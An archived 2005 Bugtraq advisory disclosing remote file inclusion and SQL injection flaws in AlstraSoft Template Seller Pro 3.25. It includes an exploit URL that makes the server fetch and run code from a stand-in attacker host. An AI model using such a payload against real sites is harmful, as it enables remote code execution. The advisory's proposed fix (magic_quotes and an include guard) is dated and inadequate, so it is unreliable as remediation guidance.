lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 15 Nov 2005 19:39:01 -0000
From: r.verton@...il.com
To: bugtraq@...urityfocus.com
Subject: Template Seller Pro 3.25


AlstraSoft Template Seller Pro 3.25 
===================================

   Software: AlstraSoft Template Seller Pro 3.25
   Severity: Arbitrary code execution, SQL Injection(s)
   Risk: High
   Author: Robin Verton <r.verton@...il.com>
   Date: Nov. 15 2005
   Vendor: www.alstrasoft.com


   Description:

	Ever thought of starting your very own profitable shopping cart business just like TemplateMonster.com? 
	With AlstraSoft Template Seller Pro software, you can run your own templates store selling templates such 
	as website templates, logo templates, flash intro templates, frontpage templates and many more! The 
	flexibility of Template Seller Pro  software also allows you to run a membership based templates business 
	just like BoxedArt.com by offering paid members multiple templates download instantly.
	[http://www.alstrasoft.com/]


   Details:

	1) /include/paymentplugins/payment_paypal.php

	   /**
	   Paypal payment plugin
	   */
	  global $config,$conn;
	  include("$config[basepath]/include/payment/class.paypal_ipn.php");
	  include("$config[basepath]/include/paymentplugins/paymentplugin.php");

	   
	  If register_globals is set on, we can include and execute any php code of our choice. This is very dangerous
	  because if safe_mode is off and there are no restriction for execution commands an attacker can get access
	  to each file on the server.

	  http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://youhost.com/our-code.txt?

	  Because of the trailing '?' we pass the '/include/payment/class.paypal_ipn.php' from the include statement as a parameter
	  to the our-code.php script so only the script we set in $config[basepath] is included.

	2) /admin/index.php

	  $sql_user_name = $user_name;
	  $md5_pass = md5($user_pass);
						
	  $sql = "SELECT * FROM UserDB WHERE user_name='$sql_user_name' and user_password='$md5_pass'";

	  The User submitted variable for the username is inserted into the database without andy validation. Because of this
	  we can insert malicious code into the database.

	Nearly NO user-submitted variable is validated , so there are a few more SQL-injections possible. 
 
	   
	   
   Patch:
          Insert constants and use the following code to prevent against such attacks

	  if( !defined('IN_SYS') ) {
		die('Hacking Attempt!');
	  }

	  and activate magic_quotes_gpc
  
   Credits:

	Credit goes to Robin Verton

   References:

	[1] http://www.alstrasoft.com/template.htm
	[2] http://myblog.it-security23.net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ